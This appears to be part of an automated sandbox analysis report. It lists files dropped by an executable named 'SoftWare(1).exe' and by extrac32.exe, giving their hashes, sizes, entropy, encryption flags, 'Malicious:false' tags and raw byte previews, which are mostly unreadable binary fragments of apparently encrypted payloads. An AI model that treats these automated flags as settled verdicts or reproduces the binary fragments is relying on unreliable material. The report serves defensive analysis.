                                                                                                                                                                                                                                    SSDEEP:768:v60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8v:v6iTcPAsAhxjgarB/5el3EYr2
                                                                                                                                                                                                                                    MD5:82089ED22B3CAF8FE245113A15305822
                                                                                                                                                                                                                                    SHA1:AD39B56C76815FF9BDC8253FC397195858D73B4D
                                                                                                                                                                                                                                    SHA-256:52CD7E1BBB93F6FA37F9CA00C26EFA2233C0B8287D8A0505A366D423515CCAF7
                                                                                                                                                                                                                                    SHA-512:120D2686BACF434B921FEFF198303F4FB4C859D704EDC514D670C947CF29924EB1628B0D094DD867FE94C4CA49E82EDA74B6677224FFB7BA207B1E3F5A77777E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:c.Deseret.Devanagari.Duployan.Egyptian_Hieroglyphs.Elbasan.Ethiopic.Georgian.Glagolitic.Gothic.Grantha.Greek.Gujarati.Gurmukhi.Han.Hangul.Hanunoo.Hebrew.Hiragana.Imperial_Aramaic.Inherited.Inscriptional_Pahlavi.Inscriptional_Parthian.Javanese.Kaithi.Kannada.Katakana.Kayah_Li.Kharoshthi.Khmer.Khojki.Khudawadi.L.L&.Lao.Latin.Lepcha.Limbu.Linear_A.Linear_B.Lisu.Ll.Lm.Lo.Lt.Lu.Lycian.Lydian.M.Mahajani.Malayalam.Mandaic.Manichaean.Mc.Me.Meetei_Mayek.Mende_Kikakui.Meroitic_Cursive.Meroitic_Hieroglyphs.Miao.Mn.Modi.Mongolian.Mro.Myanmar.N.Nabataean.Nd.New_Tai_Lue.Nko.Nl.No.Ogham.Ol_Chiki.Old_Italic.Old_North_Arabian.Old_Permic.Old_Persian.Old_South_Arabian.Old_Turkic.Oriya.Osmanya.P.Pahawh_Hmong.Palmyrene.Pau_Cin_Hau.Pc.Pd.Pe.Pf.Phags_Pa.Phoenician.Pi.Po.Ps.Psalter_Pahlavi.Rejang.Runic.S.Samaritan.Saurashtra.Sc.Sharada.Shavian.Siddham.Sinhala.Sk.Sm.So.Sora_Sompeng.Sundanese.Syloti_Nagri.Syriac.Tagalog.Tagbanwa.Tai_Le.Tai_Tham.Tai_Viet.Takri.Tamil.Telugu.Thaana.Thai.Tibetan.Tifinagh.Tirhuta.Ug
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60701
                                                                                                                                                                                                                                    Entropy (8bit):7.997145915162595
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:fTEZQScL2YdHXnVxWQQVJbCSf/Na++VjC5cZxjIJOxJ7rdNI:fAqjL2z7HCU/N5sCy37J7Ze
                                                                                                                                                                                                                                    MD5:9D1B19F75A6C3A6FA37E434554EC6FC3
                                                                                                                                                                                                                                    SHA1:57DAF72EC3C1B995CD372B1B91FEACA2DC91F4D2
                                                                                                                                                                                                                                    SHA-256:5910F5ECE030A23FA81146158EBD892E62E187EB755942FF44E2685660CCEDA3
                                                                                                                                                                                                                                    SHA-512:87BD3CE02B3CC31FAC2B1CA4096131B7B3A71F1D47C91CE3E3D9045BEEE534D78DB96B6A577A9CEA0D685C6AF9AF744F9C32EF0E1F508B83DF36435F36B12C39
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.>...#.%T....V3......I..&C.:.h....)F._M..|.'...M.i...8....W]..U..x. ./.F;."..(..}ywF.qGK......v..WH/5..D.Q..j.X../.W.j.".i...^.@.u...|.=...W8.u<..iDo...{;...1BgSl"tb..K,.....]...g......RG...J.....+:..)..?..=.,I.-.!..!...#............a...-G..@.@.cQ.T.....W...j....R...}...%o....S.......,.....k...L.....dg,..<..qm......JJ...~..V.......].....^....~<c0...G....N.{.}....4...!2K..2......+.~=n....E...~SG...(..W...&...a.&.<........DfN.pc....o5"U...."....T....N....'..@..s.6..>:..=...w:.SD..'..u...O)...`.5N........T1ZN\.M.#F.(Lf|..~.?.h.@..l.a....;v........<..JK..$..y;6.4QN.1...f..L.....X. ..!.~.5IG.o.Nf..U.pk...+...RZ0...3.....O&]P.M~?Q.9.....O.,...+=z.'.......^..p.. .(v....}!...m.$..xS..C|).p..k.R.F.d.Q.s...@4..Ov;...X\_..X.....P..6b.v.|0pS/...B._....0cW;_..ks.5q.s7.F.....xu..-.5..b....+B....&E.4.........b5.../"..$.=3^|...k..g..R.~.2|..}W.H..Ziz.........S./A...K.&.dG........K.fif$.3;.cXO>.Dl..5...u{.T....p[.....6.....Ig....z...A.\...Gu&.h.A
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):60416
                                                                                                                                                                                                                                    Entropy (8bit):7.997350147800307
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:HS+yOfAEwdoFWcfvkDjhTNEjnSUxbOvq3klC8sDGuCHZ/b0m+:y+AEwg+hiOvcklC84m1h+
                                                                                                                                                                                                                                    MD5:C4044C7AEEAE529CEAB3665A5180C124
                                                                                                                                                                                                                                    SHA1:55E303EECDEA51AA9E8E031FAB9C76E4A43BBDF4
                                                                                                                                                                                                                                    SHA-256:04D56F70F8F95027DDD846283DC288262B36FD7FA07C9D1C270C6F845EA5947C
                                                                                                                                                                                                                                    SHA-512:EFB8F52B7C01DC3E2344330907A26130EEFF0AD008AADD21798213A76596425AE578465EB60E46A4359E73D8D50CAC80AA23188E700B2EB9084598F4D1766B31
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.....`.R...k.$..R...,......L.t...L9.....[@H..<o....nAV.X.| _. .9...I...........R*.......3..d...N.Yt..c...F...i.|`.......A...K.(.a...0.*....Xm..@B.0.4P>.>.l.^......D:...@X....Dau.0...>:.._....X.l...f]V....)s..\.r....c.....&....!..f^c|.I7X..f&.B.:..W.Cp].+....TC.yk..?.V.<u^.cm...M...W.i.!..]\I3.....a...voD7..$.Ln#.^.......6P...I.#...$..A..3...I;.....6..N2.ha.._..... s..{b..BA.*.>!.A@Mu..C.o.[..x.....G.e.xw..R...~..u.._1..!........a.5....Ke.9...yy....{......\..v......$...h:`..NN.(....~.u.X......C.P.........=|i..4../.M....BZ(.T$....e..+...hn.~...2.....l......Z...B....U.\...s./..8..f.(..r@...*......UT..\..3.1...0_E...u.bQ..;.&...C.W.O....z....^N.....OC-..$6D=D.i.o.^...S~.2'...e ...... .0..Ww...8.(.....r.T...X....S.....t:Xv.x.1[m....C>.h../...U..:..Qe5%.. 0.4.,5N1D...mR...5.:E...z........}..o......?..Cd.T..z...l*..._S......xU...../d@.j^.n.].M....S.-...IZ.Xc...+...A.........d..~Z..+W.x..qr=.-;....i.T.e..F7S.m.....^...R4.{..w.X...G.s......=:...S..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):75776
                                                                                                                                                                                                                                    Entropy (8bit):6.537002356356331
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:pRmLORuCYm9PrpmESvn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/h:TR8CThpmESv+AqVnBypIbv18mLtJ
                                                                                                                                                                                                                                    MD5:7BFF06CE1E7E127D537AC37713E91800
                                                                                                                                                                                                                                    SHA1:906EDD84EF8677793C81220941D7CBC20E2809B5
                                                                                                                                                                                                                                    SHA-256:6447A681E69C6B8FE06F813CDEEACFBD8A98AD1A056C24BE19217BB2E7B3067D
                                                                                                                                                                                                                                    SHA-512:4710BC485E5DEFC94ECCBC8E9E88A94B2127D68DD6F60A4070FC504F316782DF1A7BDDB419E64207DA2BF935625F6635F3C2C9DB1EFDAB4D966E519DCA07A76A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.[....U..E.V.@..0.../...F..0....I...u..u....y....&..F.....3.^]...U..E.Vj...@..0.E.P.G....u..u....A....&..F......N......W.}.......8.u..H...t.Q........p.....I..............t.Q.J............_. .3.^]...U......<SVW.}.3.\$............G..H..i...O.....D$..D$..I..i...........L$..b_...L$(.Y_...G..p........N..D$(SSP.T$$.T.......D$(.L$.P.j...9\$.tM.L$...}....u@.t$..L$<.R...L$8..z....L$8......]......].t.........#..C........].....h...L$(....\...L$...\....tS.D$..D$....]..G..p.....-...E..~..@..0....-...N...j..t$..%x..YY..u.......#..C....._^3.[..]...U..QS.].VW.E...{..v..C..H..Ph.....u..E..C..0...o-...N....U....s...tC.v....T-...F..8.C..0...C-...u..F.W.0......u...........F......>.....6....-...F..8.C..p.....-...F.j.W.0....I..}............G......7.g....ul..0.I.=....u_.}..tY.C..p....,...F..0....I..C..0...,...F..8.C..p....,...F.j.W.0....I..}......O....G......7_^3.[....U......T.E.SVW.X.3..@..\$..|$<.p....4,...N..T$@...D$@.A..D$D.A..D$H.A...D$L......!|$.h`~L.......t$H.D$4Y...............
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):66560
                                                                                                                                                                                                                                    Entropy (8bit):7.997279607135312
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:o1ep5Z9eIaFJbZMBLDc29mh7ZKG22ibL6HQI9Rro0MrAX:oABeIGPCQ8xNbLrMMAX
                                                                                                                                                                                                                                    MD5:27FA75FCBBEFA6E473268375773C3466
                                                                                                                                                                                                                                    SHA1:E920DB666F9663D6E3C4448488D44D6B4327B5BB
                                                                                                                                                                                                                                    SHA-256:2A31EFDB064CB9FBE7C079DF5854D7421CF744DA1244DD7173B9AD1B1DE1135D
                                                                                                                                                                                                                                    SHA-512:30CFBBCF9C95FDD75382AC37C1F970D4ED0E1F1DC8EA96C5B073416924718BA2FFF4C3D2D3BE4BE23D4A41AA6AB49456F114A3652E7CC60BD7CB2BEA6A9BBEF3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:o.....0.....1;....V....W..,\Zb.d.....U...V...4=X....q.`....h.c.1D..........S..I..sp.I..Ke.6...N..+r...y..O,.... ....k..hA.t`.... ....~...t....c.~+.6.e..j|.j...xKQ...D=Me..s.C.\'.4....op.}.z.o....%.-Y.QY. ......k...\..A....z.,.7'~LXwi.......[_...n....8."........rkR.? .v>r........gY...gl...:...G(...s.5...[.i..*..E..9.."~.E1.R......%.r,..{.L..[.p..7.`.....7.'._/...}......e.D.......2r.Ug...XO..h...y0./R...........^.W....X3..~.ru!.M..8......J....is........Y.,..)uz*!.....k.shw.]K.....R./..<lC..B.[0.n....8.g...O.kd..qz....S.?...u.D......N=...02..Jv.-~.......(......o.q.Z....='.5.d..?....,x.....hs 7K...C.Ia..bL.C.9...<.).W.......i..x3..r."....B.....{.-..&d8..}r!..4......A=...w....V..dWm....RE+.%.G..Z..+.j...?x..[..).........>..... ..:...=.#..#u......r..:..W......@.E.....D.s.....0....q.....&r...+.=......~.,2.9.wV..",..\..2.....4^yi....|Tu.S3ci.Jm.r3..5.v..* 5X ...m..........$.K....;,#....f.:...o.cw...=,.`1gK...oj.(..'.//..._.k'...v<3...X.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):141312
                                                                                                                                                                                                                                    Entropy (8bit):6.419620114632187
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:kg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05m/:H5vPeDkjGgQaE/loUDtf0Q
                                                                                                                                                                                                                                    MD5:D988083A93547D995A66D13BD7EDA380
                                                                                                                                                                                                                                    SHA1:F752C91BF43F742199364237FD36C696F06FB11C
                                                                                                                                                                                                                                    SHA-256:1C9884FD44070215668FFB06AC9142508378F914D6CC5354AC8D148418B6D402
                                                                                                                                                                                                                                    SHA-512:25A994BC6A9C69A74D7CF4ECE7942D3B07554A72DF22CCFD196D064024E36DE4677E145D8C52CEC09DB480955F462D3A598A2A1FB3548A97498DF21FF69910E1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0.....^...U....SVW.}..E.P..7....I..E.l....E...p....E.PV..x.I..M.E.;.t...u.;.x...uw.s..5..I.......f#.j.f.E.X.s.....E...u.f......f#.j.X...f.M..E.;.|..........}..t...|...;.......;....}..t......._^[.....}....t.....x.....s.......U......(M.V.u.WV.......@)M.....8..........;u....
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):95232
                                                                                                                                                                                                                                    Entropy (8bit):7.998455469644948
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:xNPjc5Tow2gtH6Yf2lF8ANod07eCXu3xrdApMY/mXcQwlVfTQXp5xcH9Q1S9:xW6w9d6Y+lF8A32yxScQgVfQ7+Q1S9
                                                                                                                                                                                                                                    MD5:80BF277798C224135E99FE386BACD1B2
                                                                                                                                                                                                                                    SHA1:8941E3B516A28BF542A9C56E5B7B900B49B66E3A
                                                                                                                                                                                                                                    SHA-256:7E13C4974D4D50CA994616811CBFDBBA287A6CBE2C8E4BFD8BFD7A0B545B7E91
                                                                                                                                                                                                                                    SHA-512:E8FAEBB31681299F06ABE6506B226045FFC28DF523773B07E20E945EE85A140542F4D365C2F0ED2C9C24F3E8227D89A2E89CA7FF84AE9B4774EB0451751A6CC3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..72........U_Sg.9?.`t.1.Fwzj.........1{...?....s.I.KRaU...n...y..X..wq..dIo%.;.{.Hs.V...L...w&..3...G..F......]..46#v.'u.# K.w...Z..2y.X...].U66..H..kj...D..[.y..........N..W8 ....K....N......|.h/..e8.\6.`..`2|d^.X..9.\..X...>6H.B0.9..o.=.A...`........lCE...\)l.N..$...,..*y5..8y.CB.`...kJFOgc9....WW..ZU..".;.1..5.}1Z.......WR.OJ......i.10F.sGWliK.f...21`..Ai..c.{0.....E9..../......-F.\.....-...r.{...G...HY..n..u)....U..>%.q.c...?.....Op..k{6kz.r.]:........Yq.u........."1}...L,4....~.G2[..Mkr?1.....}..I...I.'vi<q.|......:.#...._^V@.QfR.V\].\.#5n...V./`&z..L..Pd....-.4..W.j..*...,...W[bM..}....rC...5A.}.3..{...-.....n....}.%....Pn.BfWCx?..l....-|..tM......ln~.}...M...AS.x!...9n6i.8.x\..O5..rNW.....".Y.....(j..&.m...[..Gg..^EqU.{..%..~d.|..W9e....."...h..%.Q......r......j.V&....8b...sbE......../,...zx...0...g..2....x............8U.<.......a....cO.}>..zi..:.4.T_.0..d.rX...P...>..F&T..?..-.....6...'.....z........A..F....68..^!S.u.>.V7....L.........
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 488065 bytes, 11 files, at 0x2c +A "Classifieds" +A "Mileage", ID 7296, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):488065
                                                                                                                                                                                                                                    Entropy (8bit):7.998450562768744
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:12288:0UXlS9o4A79ZyzgFWlPL/P/SFytKmt+DidydArMiIPz:1VWTA790ze+jP/SAAPDidcAriPz
                                                                                                                                                                                                                                    MD5:E7C7000EC72D4B4AACB22123F14434E4
                                                                                                                                                                                                                                    SHA1:DCC3E9A8690C96BF360730FE551CEBDB6EABC6C1
                                                                                                                                                                                                                                    SHA-256:E3E6C6C89BBB99B2FFD8801CE20F29D3CF1FCDAADFB916C08C220BB86AFC81EC
                                                                                                                                                                                                                                    SHA-512:2B846A72B4D5EFAA0F819BBCBE0DA825D8FEB9A33CBE978428D394884DBFC749CA8C531E85FBF46A656FF9E705D63D4D4BB1342DCE7CC419948A760B69A4DFEB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MSCF.....r......,.................../..................Y1. .Classifieds..<.........Y1. .Mileage......,.....Y1. .Accepting.c5...6.....Y1. .Timer.....[l.....Y1. .Visibility..,..[......Y1. .Pack..(..[0.....Y1. .Grand.....[X.....Y1. .Academy..(..[T.....Y1. .Do.....[|.....Y1. .Spiritual.....[h.....Y1. .Man......,..CK.Z}.\.u?..l..(.6Q.2..b.^..8..avfgw...3k..2..y;.o..o.xw..H.-QiCZ.:.j,.5......HU.....EF!.4 Q.?hE.."..-..{.......s.=..{.=..s.o.5{.kz.O...i..e.].Y5:4.\.z..N[..4..n.G.v..1.kYN...MP.m4........5:^.@n.K4.?e..g...K-......9.w....k....A.v.t-..].m..|...g6P..]..:..KF.6N[k..8.0.....J....d...0.{...t.X5Z..0-.uz-!j.M...%......@.... yV..f..I..v...i.._.@...M.6......uf....l.f..q..X(...6.(u.<_...7..5...gZ..c.2.1;..z.Z2..h.eb.W3}.g.6C@t.g,.>....e...q...X....,..5H.G.m..\..V..7iv.Y.f.*6[.hW3-..).j.3l...Y...U.q..).n[#Q....O.V......A.^.. /.V.XnU..`........~5cAI.>..TjP..E*..f....cB..{..C.....3.@k.L..Is}.R...5(.Z...k@.\...@7Xk.....V..B([..V..KTF...k`fP^.Z.c)E....Y.Y..}V^.b
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):86016
                                                                                                                                                                                                                                    Entropy (8bit):7.997986286159027
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:GWNCt2C4YQrJ9PfZe4iK9xGLKPzZnvnQ47kz6jkaxaWdTDxrDq:3QtefxnxcKPdvxs6oGaG9Dq
                                                                                                                                                                                                                                    MD5:0C0FC9354C16999CA022F170E01215E5
                                                                                                                                                                                                                                    SHA1:8CBA4248AE1008360A23C425F0CADAE672B517C4
                                                                                                                                                                                                                                    SHA-256:07F726D222889DA9AE406BBD94EC9DC4B57680D032BAC0DD67AE82BAC20BE51B
                                                                                                                                                                                                                                    SHA-512:C4595FF9224E7D43B470C2FD6C29754A5344FACD7BB55508572FF836D23B942E5133348B89319A9501682E091B180C52D61116E519693F3739D68B863293341C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.,A2.?.....'...W<.`.../......5..5WXf..U..:F7....o|..f5........|.g"..H.;8..._..y...Wp..g.6H...H].:....E..<...K....C.e..>..}.<..=.../...)..<.a.oC.ZL.nn.,_f....11.>...~..P.Hf."8...p.Zj*ld.".Uh....6ZBs.V2..G..Y...6.X...)...6#...../L..... +.#..(...,..mZ....O.!.|.?...5+&.%.`b.AtX5.d...u#..........\.\...Od..d.......r..i(b..V...k.rb...bt.dZ..sq...,.W]..Y|.0.u+..UR."G...&..=v...\...8...>.\N...6B..} .U..<....P.~D.\.R.".9;S.].<k.*..x.....U.(.j..P....\....#.V.........T@..bo`v.....[c..Ie.7..o.B.:.^KG0.........g.....b).v.'..r..J*.LW......0..W5+....a....X..y.=.8...QJ]m.50aIh..B..}...(.-.].BW.....lnkb.E.a..,J`.n.}...|... &_..k.f+.xw...c\L..'B.j.^.,....F^2Nz.3j.+z.=[.....{.9...I.,...N.......a........sw.....D....D..Oo.C.1.".l..+#.T.n.........q.......G..vVZ..Ls.#.~.R....r.A.ms....>..FL..T.<..F...:..f8MQ......s8..D.v........l... .vz.2.........!..W..z0[....t..0>.....4..l.<...{....5 @l..<...Ps2b..0UL.G.m..H...."..1. ..~...m.v#L..q.m..{TU.;iz.i...Y6/-.u......V...m,.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):68608
                                                                                                                                                                                                                                    Entropy (8bit):6.561605242223398
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:b8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6Ls:b80PtCZEMnVIPPBxT/sZys
                                                                                                                                                                                                                                    MD5:3090C7F97B0837ABBFE8C27B6F07F341
                                                                                                                                                                                                                                    SHA1:C4357FEC90399EECD91AD5D9C6AE640FEFBD05A6
                                                                                                                                                                                                                                    SHA-256:85456FD9E55D7314D509F09494DF2A4D6E8D5F88A02196F3DAFD5145B1F13614
                                                                                                                                                                                                                                    SHA-512:B8A3662A19E0A89E433CBAE14B6CD68A6C6BD09BBA4CDF1EBC8AF45D6AAA0ADF43449C3787C3B33351AFC81076F4A1CE4EDA694916944949F6C2E5C69BCC5391
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview::.t...t..^_.B.[.B.^_[.B.^_[.B.^_[.+I.....+I../...+I..V....T$..B..J.3.......L.......T$..B..J.3........L.......t.M......%....n.....1..V..(M....!.....^.)....KB...q3.........#M.............M......45M......t5M.......5M.......5M......5M......6M.......M.....G..H..k....E.........H..|....D..t..@8.@......|....D..t..@83.X..`....F..H..&........F............P.v.W......v...............u...(M.........L)M.......@)M..u........(..\....L)M.......M..i...j.j.j.RWj..E.....I..E...u.j..E.Pj..u.W....I.jP3.PPj.WP....I..E...u.j.P.E.P.u.W....I..E..M..=<.I...t(Qj.h.....u...H.I..~ .t..v ..E..F .M..E...t(Pj.h.....u...H.I..~$.t..v$..E..F$.M..E..}.....g.......#..\....vL.XP...g...j.j..u...X.I..}....w...<.I..g.......H.....%...WV..O........~8.t..v8....I..f8..~<........v<....I..f<.......~@........v@....I..f@.......vd....I..fd.......vh..<.I..fh......vD....I..fD......vP..<.I..fP......w ..<.I.......w$..<.I......3..~..=@)M.....8.u.B;.|..L)M.........A..............]............j.^;...&..........
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\SoftWare(1).exe
                                                                                                                                                                                                                                    File Type:zlib compressed data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):93184
                                                                                                                                                                                                                                    Entropy (8bit):7.9979284760365035
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:1536:FKtTXB9x/JoFGD63foeClHsHfZsX6QXKd1ZSD6xxRh0Y7UfmKA/L3uZkEsn:IBDAG+3foLAfZsX6QaVhxxUYnjz33Jn
                                                                                                                                                                                                                                    MD5:14BC75DCD926FFC2C3EAF97BA5526E17
                                                                                                                                                                                                                                    SHA1:6A1C25944DD7E6736CB4E3587AC70DAA14DD8F22
                                                                                                                                                                                                                                    SHA-256:1632A5E4051F1BAE390D0A9143505A52462715EC77E670507CE1357A91DCC869
                                                                                                                                                                                                                                    SHA-512:A83BEC8A812871FA39A2D94A7C177DA2621FAF475CC4489C5A58DA9EF888FC835DE29B50EED06977297CC6A1F04886F3D367BBEBD923B25396218923F98D4DC4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(..r<.A1....u..6...?..2.A.<+...z...HG7q..).FG.{.Z..-4.^.|0|..0..qb[..USH"3.HH.7...-..F.%.......I...% 4lFD..Q..46D......+.5.!=.j.}V0.#...:...4<gw..v..,.e.P.bK..z..fi..12#N......Z.]"`.P..x..|../y<h....D...............p{.^.R./.L...4r.=....u,2._[.Xo.1.\:......P.:......aU.g.12...^Is.n^.+...W...I........[lz.M%..?....f.......v@..&.u.......r.0?l.%[Zf....3P.........!....y....,..F......w...^.h.;Fu`...T.9;Cm.v...<4.6.7E....d.Q.h.3....V.{..\.;=.e.+^I.l).Z.h..Y.h(..,.........<%....B...@.+...X.49..fT.........^.E."...X...q...t.%./.!."439...1....O....@.v..`.s..;.Q/.#G.\.iDJ;.Mw_.v....N.....d..c......Y.E;.G.B...]@.yRs.*.../..n).....o.E.N.".....Q.2...t_..]<..,..F.L..F-..dZ...!..........R....)EE>[Gn........{..lr..-.....F.&.n..^..I@K.MK.o..;l.... 7.iq[.z...`..A..9.+'...]Y*..Zf..`]F4p.'.4..z.!..Y.k\X.6i.....8?O.#.q...V..;..8g4K.Q......\.9.P.f+.....Xg.......8.(..a.l..HCh.Yx:."ep.?.C...."...Iw.....#....A%....k2..i...L......].X.r\Lr.....\.......N..c...
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):146432
                                                                                                                                                                                                                                    Entropy (8bit):6.4530808223759255
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:/fhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuzk:/fhnvO5bLezWWt/Dd314V14ZgP0JaAOQ
                                                                                                                                                                                                                                    MD5:29D811C2F833486A55C9D373AB30F75C
                                                                                                                                                                                                                                    SHA1:D83249E1EC71D291668958BC25E0D057E04252D1
                                                                                                                                                                                                                                    SHA-256:8C813756E0CB77E74A081505F40E3F256CE06CDF7742A1E5F3F4EEB7BB89C733
                                                                                                                                                                                                                                    SHA-512:60C772206686FF3D4ADEA0E5B2F14962C9BE9AFB0577EC8608394CEA51E7CB7CF96EF388D589551FF8172A767ADFCABCA96AD4ED89E054AD634C6AE99D626BEE
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.f9E.t.Q.M...-...M......M.h..I..^......M.;.t..0.7...E..U....E..@..D...M.f9H.u=.z..u....U.R...P...t`.E..P.u..u..b.....y.QQ...V........3.@...z..u....U.R...P...t#.E.....M.Q.M.Q.M.Q.M.QP...@.....y..u.h................U..}....G......@.f;E.t.f;E.t..u.M...,...t.M..V.....uY.E..8.....uG.E...P.....Y8].u6h.6M..M..-.....H..D1.8\1.t..@8.@......D1.8\1.t..@8.X........u.QRW...q.....M..,^...M...5...M..E...I......u...x..Y_^..[....U..QQVW.......w.t..v8.E......]...]...E....F......G....._^t..@8.@......U..S.].V..W..@.I..C..F...tMj.Z;.r...V.3..j.Z.........Q.[x..3..F.Y9~.v(j...x..Y.K.........N....G;~.r...3..~..~._..^[]...U..V..j(.f...f....w..Y.u............^]...U..V......K...5...v...w...E..Yt.j.V.w..YY..^]...U...........E..d$,.SVW.}...D$.....\$4.O.+.q.........N....D$h.A..D$l.A..D$p.A..L$.....D$t...O.....$.....+.....T$....;.tE.u....d\...&..F........@..|....L..t..I8.A......|....L..t..I8.A........D$x..$....P3..D$@@.I.!|$H.D$l!|$L...P.|$H......uD.u.....[..!>.F........@..|....L..t..I8.A......|....
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                    File Type:DOS executable (COM)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):142336
                                                                                                                                                                                                                                    Entropy (8bit):6.71403291701726
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:kTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBh:BHS3zcNPj0nEo3tb2j6AUkBh
                                                                                                                                                                                                                                    MD5:DCDA63A12F9B6D5A76A75DBC6E1DD400
                                                                                                                                                                                                                                    SHA1:CDB832AC1EBB49D61D8B401BD31FDF037A48A84E
                                                                                                                                                                                                                                    SHA-256:94E1F932DB010F9789983C38B61AFA679D08DA7F444DBE5827B0FF629594A6F4
                                                                                                                                                                                                                                    SHA-512:6E3005012ED0E1A568DB9013367C77DB926E8D08D32250E3BDAA4665FA4716CF9B256A7687A47709D9DE8305FD4A3B14AD00518CD00936F63A55D4E57A773A9C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
